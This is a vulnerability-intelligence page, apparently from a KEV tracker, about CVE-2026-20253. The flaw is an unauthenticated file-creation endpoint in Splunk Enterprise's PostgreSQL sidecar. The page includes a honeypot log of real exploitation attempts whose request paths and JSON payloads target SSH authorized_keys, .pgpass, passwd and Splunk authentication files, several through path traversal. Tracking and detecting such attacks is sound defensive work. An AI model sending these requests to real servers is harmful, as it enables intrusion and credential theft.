Critical
CVE-2026-20253
PUBLISHED
Unauthenticated Arbitrary File Creation and Truncation in a PostgreSQL Sidecar Service Endpoint in Splunk Enterprise
Not yet in CISA KEV
- Vendor: Splunk
- Product: Splunk Enterprise, Splunk Cloud Platform
- Published: Jun 10, 2026
- EPSS: 0.1% · 21% pctl
Description
In Splunk Enterprise versions below 10.2.4 and 10.0.7, and Splunk Cloud Platform versions below 10.4.2604.3 and 10.2.2510.14, an unauthenticated user could create or truncate arbitrary files through a PostgreSQL sidecar service endpoint. The vulnerability exists because the PostgreSQL sidecar service endpoint lacks authentication controls, allowing any network-reachable user to invoke file operations without credentials.
Weaknesses (CWE)
- Missing Authentication for Critical Function
CVSS Scores
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploitation Status
Exploited in the wild
Recorded 2026-06-15 05:15:25 UTC · KEVIntel
Active exploitation observed
Recorded 2026-06-15 05:15:25 UTC · KEVIntel sensor
Proof of concept available
Recorded 2026-06-12 10:04:32 UTC · GitHub
Observed Exploitation Attempts
Exploitation attempts against this vulnerability observed first-hand by KEVIntel private honeypots over the last 30 days.
- Attempts Observed: 55
- Unique Attacker IPs: 11
- Attacker Countries: 🇫🇷 🇭🇰 🇰🇷 🇸🇬 🇺🇸 🇻🇳
- Sensors Observed: 2
Exploitation Attempts Over the Last 30 Days
First observed 2026-06-15 05:15 UTC · Last observed 2026-06-15 16:25 UTC
Recent Attempts
Showing observations from the last 30 days.
| Attack Time | Attacker | Sensor | Request | User-Agent | Confidence | Payload | Payload fingerprint | Source |
|---|---|---|---|---|---|---|---|---|
| 2026-06-15 16:25 UTC | 🇸🇬 35.197.128.152, Singapore, Singapore | 🇪🇺 Splunk Enterprise | `POST /en-US/splunkd/__raw/v1/postgres/recovery/backup` | python-requests/2.32.4 | High | `{"database": "search_metadata", "backupFile": "cve_2026_20253_detection_probe"}` | sha256:5732074a5a0fd3fb7448a3d53918eec4f815a476d8653222e4b886a1b4edaf0c | KEVIntel Honeypot |
| 2026-06-15 15:54 UTC | 🇺🇸 35.225.104.130, Council Bluffs, Iowa, United States | 🇪🇺 Splunk Enterprise | `POST /en-US/splunkd/__raw/v1/postgres/recovery/backup` | python-requests/2.32.4 | High | `{"backupFile": "cve_2026_20253_detection_probe", "database": "probe_check"}` | sha256:736587e420cc53699ee129d05e94bc1b81824d23791f9fb67b0e5ba19da986f2 | KEVIntel Honeypot |
| 2026-06-15 15:22 UTC | 🇺🇸 35.252.131.69, The Dalles, Oregon, United States | 🇪🇺 Splunk Enterprise | `POST /en-US/splunkd/__raw/v1/postgres/recovery/backup` | python-requests/2.32.4 | High | `{"backupFile": "cve_2026_20253_detection_probe", "database": "probe_check"}` | sha256:736587e420cc53699ee129d05e94bc1b81824d23791f9fb67b0e5ba19da986f2 | KEVIntel Honeypot |
| 2026-06-15 13:15 UTC | 🇭🇰 8.218.74.160, Hong Kong, Hong Kong (seen 6 times) | 🇪🇺 Splunk Enterprise | `POST /en-US/splunkd/__raw/v1/postgres/recovery/restore` | python-requests/2.26.0 | High | `{"database": "search_metadata", "backupFile": "/home/splunk/.ssh/authorized_keys", "passfile": "/opt/splunk/var/packages/data/postgres/.pgpass"}` | sha256:21b73b887985d20779294f986a97f89d244737aab3de01f76f157c82dcf65e67 | KEVIntel Honeypot |
| 2026-06-15 13:12 UTC | 🇺🇸 34.11.20.243, Washington, District of Columbia, United States | 🇪🇺 Splunk Enterprise | `POST /en-US/splunkd/__raw/v1/postgres/recovery/backup` | Mozilla/5.0 (SecurityAssessment/CVE-2026-20253-Probe) | High | `{"database": "probe_check", "backupFile": "cve_2026_20253_detection_probe"}` | sha256:10e7a0ce6d1004ecfb31d60b67f518da61385a9d158628d853d183a781626d06 | KEVIntel Honeypot |
| 2026-06-15 13:11 UTC | 🇭🇰 8.218.74.160, Hong Kong, Hong Kong (seen 6 times) | 🇪🇺 Splunk Enterprise | `POST /en-US/splunkd/__raw/v1/postgres/recovery/restore` | python-requests/2.26.0 | High | `{"database": "search_metadata", "backupFile": "/opt/splunk/etc/apps/.../payload.py", "passfile": "/opt/splunk/var/packages/data/postgres/.pgpass"}` | sha256:878a5c2451af43d6c496d1948789c7ced715d1d9a5f6938f136f7dece4d4eece | KEVIntel Honeypot |
| 2026-06-15 12:25 UTC | 🇭🇰 8.218.74.160, Hong Kong, Hong Kong (seen 6 times) | 🇪🇺 Splunk Enterprise | `POST /en-US/splunkd/__raw/v1/postgres/recovery/backup` | python-requests/2.26.0 | High | `{"database": "search_metadata", "backupFile": "/home/splunk/.ssh/authorized_keys"}` | sha256:ab577c353deda5c94ed46a3c01113828bf831ff504b72cae2f5be44e4110c0ea | KEVIntel Honeypot |
| 2026-06-15 12:25 UTC | 🇭🇰 8.218.74.160, Hong Kong, Hong Kong (seen 6 times) | 🇪🇺 Splunk Enterprise | `POST /en-US/splunkd/__raw/v1/postgres/recovery/restore` | python-requests/2.26.0 | High | `{"database": "search_metadata", "backupFile": "/home/splunk/.ssh/authorized_keys", "passfile": "/opt/splunk/var/packages/data/postgres/.pgpass"}` | sha256:21b73b887985d20779294f986a97f89d244737aab3de01f76f157c82dcf65e67 | KEVIntel Honeypot |
| 2026-06-15 12:19 UTC | 🇭🇰 8.218.74.160, Hong Kong, Hong Kong (seen 6 times) | 🇪🇺 Splunk Enterprise | `POST /en-US/splunkd/__raw/v1/postgres/recovery/restore` | python-requests/2.26.0 | High | `{"database": "search_metadata", "backupFile": "/path/to/target/file.py", "passfile": "/opt/splunk/var/packages/data/postgres/.pgpass"}` | sha256:43880c333b8d86420727b9ed2d01ebc0cfde001aed7f81e66d621b9907c19627 | KEVIntel Honeypot |
| 2026-06-15 12:16 UTC | 🇺🇸 154.16.27.85, San Jose, California, United States (seen 24 times) | 🇪🇺 Splunk Enterprise | `POST /en-US/splunkd/__raw/v1/postgres/recovery/backup` | Python-urllib/3.10 | High | `{"database": "splunk", "backupFile": "/../../../root/.ssh/authorized_keys"}` | sha256:f6cc8ad01dcd4394b4a8aa9539b3dffa900f4fdb570b65efe5fb4b5ea1a71421 | KEVIntel Honeypot |
| 2026-06-15 12:16 UTC | 🇺🇸 154.16.27.85, San Jose, California, United States (seen 24 times) | 🇪🇺 Splunk Enterprise | `POST /en-US/splunkd/__raw/v1/postgres/recovery/backup` | Python-urllib/3.10 | High | `{"database": "splunk", "backupFile": "/../../../opt/splunk/etc/passwd"}` | sha256:54e0eb57b3c221d156d3841c19440e8f6f9f5e07cd212b0b467896b05cad0d19 | KEVIntel Honeypot |
| 2026-06-15 12:16 UTC | 🇺🇸 154.16.27.85, San Jose, California, United States (seen 24 times) | 🇪🇺 Splunk Enterprise | `POST /en-US/splunkd/__raw/v1/postgres/recovery/backup` | Python-urllib/3.10 | High | `{"database": "splunk", "backupFile": "/../../../opt/splunk/etc/system/local/inputs.conf"}` | sha256:e9382e3524bdbe5518b27ee7bdeedff0f8569ce844d5913d5985dfac162fb2da | KEVIntel Honeypot |
| 2026-06-15 12:16 UTC | 🇺🇸 154.16.27.85, San Jose, California, United States (seen 24 times) | 🇪🇺 Splunk Enterprise | `POST /en-US/splunkd/__raw/v1/postgres/recovery/backup` | Python-urllib/3.10 | High | `{"database": "splunk", "backupFile": "/../../../opt/splunk/etc/system/local/authentication.conf"}` | sha256:d78361a1bc6460dd68baa6260abd0aed7b519e6f46a15b261166de1d289ef88a | KEVIntel Honeypot |
| 2026-06-15 12:16 UTC | 🇺🇸 154.16.27.85, San Jose, California, United States (seen 24 times) | 🇪🇺 Splunk Enterprise | `POST /en-US/splunkd/__raw/v1/postgres/recovery/backup` | Python-urllib/3.10 | High | `{"database": "splunk", "backupFile": "/../../../etc/passwd"}` | sha256:e052d59d02047288e0eeed40e132eb4d592ab10027f1e912314f735aa97d650a | KEVIntel Honeypot |
| 2026-06-15 12:16 UTC | 🇺🇸 154.16.27.85, San Jose, California, United States (seen 24 times) | 🇪🇺 Splunk Enterprise | `POST /en-US/splunkd/__raw/v1/postgres/recovery/backup` | Python-urllib/3.10 | High | `{"database": "splunk", "backupFile": "/opt/splunk/var/lib/splunk/backup/splunk_creds.bak"}` | sha256:574e60494cefaf2942ee7ee8a61263e848c674ee2f6deded64f9198091717c3b | KEVIntel Honeypot |
| 2026-06-15 12:14 UTC | 🇭🇰 8.218.74.160, Hong Kong, Hong Kong (seen 6 times) | 🇪🇺 Splunk Enterprise | `POST /en-US/splunkd/__raw/v1/postgres/recovery/backup` | python-requests/2.26.0 | High | `{"database": "search_metadata", "backupFile": "/opt/splunk/etc/apps/search/bin/malicious_input.py"}` | sha256:4b678627c4321005db27d4a9d75587a20ca12b2340ed55e97ed5c0a7952ad00c | KEVIntel Honeypot |
| 2026-06-15 11:53 UTC | 🇺🇸 154.16.27.85, San Jose, California, United States (seen 24 times) | 🇪🇺 Splunk Enterprise | `POST /en-US/splunkd/__raw/v1/postgres/recovery/restore` | Python-urllib/3.10 | High | `{"database": "splunk", "backupFile": "/tmp/test.bak", "targetDir": "/opt/splunk/etc/auth"}` | sha256:0e711a12d975e1a65f03ab375b9fa95076de89bcbdf1dd0931dc9b7e69c909cb | KEVIntel Honeypot |
| 2026-06-15 11:53 UTC | 🇺🇸 154.16.27.85, San Jose, California, United States (seen 24 times) | 🇪🇺 Splunk Enterprise | `POST /en-US/splunkd/__raw/v1/postgres/recovery/backup` | Python-urllib/3.10 | High | `{"database": "summary", "backupFile": "/tmp/summary_dump.bak"}` | sha256:7059a1598a5b7e890d52fef6898e1f3418ed4ea65c296b4dbb0a1c8e5dd0cb6c | KEVIntel Honeypot |
| 2026-06-15 11:53 UTC | 🇺🇸 154.16.27.85, San Jose, California, United States (seen 24 times) | 🇪🇺 Splunk Enterprise | `POST /en-US/splunkd/__raw/v1/postgres/recovery/backup` | Python-urllib/3.10 | High | `{"database": "main", "backupFile": "/tmp/main_dump.bak"}` | sha256:c88a18ad6710ac7abd7c4963fd61a287f171420c242709e01cc85f71de01373b | KEVIntel Honeypot |
| 2026-06-15 11:53 UTC | 🇺🇸 154.16.27.85, San Jose, California, United States (seen 24 times) | 🇪🇺 Splunk Enterprise | `POST /en-US/splunkd/__raw/v1/postgres/recovery/backup` | Python-urllib/3.10 | High | `{"database": "postgres", "backupFile": "/tmp/postgres_dump.bak"}` | sha256:6b6bf1d0757bd9f0cf228fb6ba79e8599595b8d27992a5039bf95939bd458c61 | KEVIntel Honeypot |
| 2026-06-15 11:53 UTC | 🇺🇸 154.16.27.85, San Jose, California, United States (seen 24 times) | 🇪🇺 Splunk Enterprise | `POST /en-US/splunkd/__raw/v1/postgres/recovery/backup` | Python-urllib/3.10 | High | `{"database": "splunk", "backupFile": "/tmp/splunk_dump.bak"}` | sha256:bfa6d4666b65d67f7572d28eb3f2af77725f86c94a625f29d6a7e1851180d850 | KEVIntel Honeypot |
| 2026-06-15 11:53 UTC | 🇺🇸 154.16.27.85, San Jose, California, United States (seen 24 times) | 🇪🇺 Splunk Enterprise | `POST /splunkd/__raw/v1/postgres/recovery/restore` | Python-urllib/3.10 | High | `{"database":"splunk","backupFile":"/tmp/x.bak"}` | sha256:21d14999f118ad165e2324c7a9f8b2db50d149bd30043f8c9527079d849bb531 | KEVIntel Honeypot |
| 2026-06-15 11:53 UTC | 🇺🇸 154.16.27.85, San Jose, California, United States (seen 24 times) | 🇪🇺 Splunk Enterprise | `POST /splunkd/__raw/v1/postgres/recovery/backup` | Python-urllib/3.10 | High | `{"database":"splunk","backupFile":"/tmp/x.bak"}` | sha256:2372a350478d2162f6b89b0c94e82d2d711a923ee0360b7398d2e8c6fcd522b0 | KEVIntel Honeypot |
| 2026-06-15 11:53 UTC | 🇺🇸 154.16.27.85, San Jose, California, United States (seen 24 times) | 🇪🇺 Splunk Enterprise | `POST /en-US/splunkd/__raw/v1/postgres/execute` | Python-urllib/3.10 | High | `{"database":"splunk","backupFile":"/tmp/x.bak"}` | sha256:e9a59524ed7f3cfe9f1d3a4256caf01f78012c577872c754a9561758f1d61164 | KEVIntel Honeypot |
| 2026-06-15 11:53 UTC | 🇺🇸 154.16.27.85, San Jose, California, United States (seen 24 times) | 🇪🇺 Splunk Enterprise | `POST /en-US/splunkd/__raw/v1/postgres/tables` | Python-urllib/3.10 | High | `{"database":"splunk","backupFile":"/tmp/x.bak"}` | sha256:f7c824b95ffb2d201fa84df9b7bf869ec0992ba58fd1886105ba64ed41b41ce5 | KEVIntel Honeypot |
Known Exploited Vulnerability Sources
Catalogues that list this CVE as a known exploited vulnerability.
| Source | Added |
|---|---|
| KEVIntel First | 2026-06-15 05:15 UTC |
Scanner Integrations
| Scanner | Reference | Detected |
|---|---|---|
| Nuclei | https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2026/CVE-2026-20253.yaml | Jun 15, 2026 |
Recent Mentions
TheHackerNews · Jun 13, 2026
Splunk has released security updates to address a critical security flaw in Splunk Enterprise that could be exploited to conduct unauthenticated file operations and even remote code execution. The vulnerability, tracked as CVE-2026-20253, is rated 9.8 on the CVSS scoring system. "In Splunk Enterprise versions below 10.2.4 and 10.0.7, an unauthenticated user could create or truncate arbitrary
Watchtower Labs · Jun 12, 2026
Three posts? In three days? Are we insane? We're home alone, there's no one to stop us, and we're up past bedtime. So, we need to talk about Splunk. On June 10th, Splunk published this CVE-2026-20253 advisory: It has everything that we
Potential Proof of Concepts
These PoCs are unverified and could contain malware. Use at your own risk.
github · Created 2026-06-12 10:04:32 UTC · 2 stars
nuclei · Created Unknown
Timeline
- Added to KEVIntel
- Detected by Nuclei
- Proof of Concept Exploit Available
- CVE Published to Public
- CVE ID Reserved